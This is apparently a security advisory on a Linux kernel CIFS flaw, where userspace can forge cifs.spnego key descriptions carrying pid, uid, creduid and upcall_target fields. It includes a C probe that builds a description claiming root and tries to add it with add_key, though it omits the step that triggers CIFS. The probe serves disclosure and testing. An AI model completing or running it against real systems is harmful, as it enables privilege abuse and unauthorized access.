Linux kernel
cpe:2.3:a:linux:linux_kernel:*:*:*:*:*:*:*, +4 more
A vulnerability in the Linux kernel's CIFS (Common Internet File System) client allows userspace to create cifs.spnego keys whose descriptions are meant to be composed only by the kernel. Using the request_key or add_key system call, a process can inject authority-bearing fields, such as the process ID, user ID, credential UID and upcall target, into the CIFS SPNEGO key description. The CIFS upcall handler then processes those fields as if they had originated from the kernel, which can lead to unauthorized actions or access.
Exploitation would let a userspace application manipulate CIFS SPNEGO key descriptions without the vetting the kernel normally applies to them, potentially leading to unauthorized access or actions within CIFS operations, since those fields tell the upcall handler which user and process it is acting for.
The vulnerability can be reproduced by creating a key of type 'cifs.spnego' from userspace with the request_key or add_key system call. The key description can carry authority-bearing fields such as pid, uid, creduid and upcall_target. Once the key exists, CIFS can be instructed to use it, which triggers the vulnerability: the upcall handler processes the injected fields as if they were kernel-generated.
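The following is an added example, not code from the advisory or from the kernel tree. It composes a cifs.spnego key description of the kind described above, parses it the way an upcall handler would, and probes whether the running kernel lets add_key create such a key from userspace. The field names uid, creduid, pid and upcall_target come from the advisory; the remaining fields, their order, the session-keyring target and the one-byte placeholder payload are assumptions of this example. The step that makes CIFS consume the key is not shown, and the probe only reports what the kernel did; it does not by itself establish whether a given kernel is fixed.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>

/* Keyring constants from <linux/keyctl.h>, redefined so this builds without
 * the kernel headers installed. */
#ifndef KEY_SPEC_SESSION_KEYRING
#define KEY_SPEC_SESSION_KEYRING (-3)
#endif
#ifndef KEYCTL_UNLINK
#define KEYCTL_UNLINK 9
#endif

/* Compose a cifs.spnego description in a "key=value;key=value" layout.
 * Only uid, creduid, pid and upcall_target are named by the advisory; the
 * other fields and the order are an assumption of this example. */
int build_spnego_desc(char *out, size_t outlen, const char *host,
                      const char *ip4, unsigned uid, unsigned creduid,
                      const char *user, unsigned pid, const char *target)
{
    int n = snprintf(out, outlen,
                     "ver=0x2;host=%s;ip4=%s;sec=krb5;uid=0x%x;creduid=0x%x;"
                     "user=%s;pid=0x%x;upcall_target=%s",
                     host, ip4, uid, creduid, user, pid, target);
    return (n < 0 || (size_t)n >= outlen) ? -1 : n;
}

/* Look up one field as an upcall handler would. Tokenising on ';' and
 * comparing the whole key matters: a substring search for "uid=" would also
 * match "creduid=". Returns 1 and copies the value, 0 if absent, -1 if the
 * value does not fit in val. */
int desc_get(const char *desc, const char *key, char *val, size_t vallen)
{
    size_t klen = strlen(key);
    const char *p = desc;

    while (*p) {
        const char *end = strchr(p, ';');
        size_t flen = end ? (size_t)(end - p) : strlen(p);
        const char *eq = memchr(p, '=', flen);

        if (eq && (size_t)(eq - p) == klen && memcmp(p, key, klen) == 0) {
            size_t vlen = flen - klen - 1;
            if (vlen >= vallen)
                return -1;
            memcpy(val, eq + 1, vlen);
            val[vlen] = '\0';
            return 1;
        }
        if (!end)
            break;
        p = end + 1;
    }
    return 0;
}

/* Ask the kernel to create a cifs.spnego key with a userspace-authored
 * description. Returns 1 if add_key accepted it (key ID stored in *key_id),
 * 0 if it was refused with EPERM/EACCES, or -errno otherwise (ENODEV: the
 * cifs.spnego key type is not registered, i.e. the CIFS module is not
 * loaded). The payload "x" is a placeholder: the key type rejects an empty
 * payload and its content is irrelevant to this probe. */
int probe_userspace_spnego_key(const char *desc, long *key_id)
{
    long id = syscall(SYS_add_key, "cifs.spnego", desc, "x", (size_t)1,
                      KEY_SPEC_SESSION_KEYRING);
    if (id >= 0) {
        if (key_id)
            *key_id = id;
        return 1;
    }
    if (errno == EPERM || errno == EACCES)
        return 0;
    return -errno;
}

int main(void)
{
    char desc[256], val[64];
    long id = -1;

    /* Constructed sample: claims to act for uid 0 / creduid 0 and a chosen pid. */
    if (build_spnego_desc(desc, sizeof desc, "fileserver.example.test",
                          "192.0.2.10", 0, 0, "root", 0x1234, "mount") < 0)
        return 1;
    printf("description: %s\n", desc);
    if (desc_get(desc, "creduid", val, sizeof val) == 1)
        printf("an upcall handler would act for creduid %s\n", val);

    int rc = probe_userspace_spnego_key(desc, &id);
    if (rc == 1) {
        printf("kernel accepted userspace-authored cifs.spnego key %ld\n", id);
        syscall(SYS_keyctl, KEYCTL_UNLINK, id, (long)KEY_SPEC_SESSION_KEYRING);
    } else if (rc == 0) {
        printf("kernel refused the key (EPERM/EACCES)\n");
    } else {
        printf("add_key failed: %s\n", strerror(-rc));
    }
    return 0;
}
```

Build with `cc -Wall spnego_probe.c -o spnego_probe` and run it as an ordinary user on a host with the CIFS module loaded; any key it creates is unlinked again so it does not linger in the session keyring.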
The vulnerability has been addressed in the Linux kernel. Users should upgrade to a kernel release that contains the fix.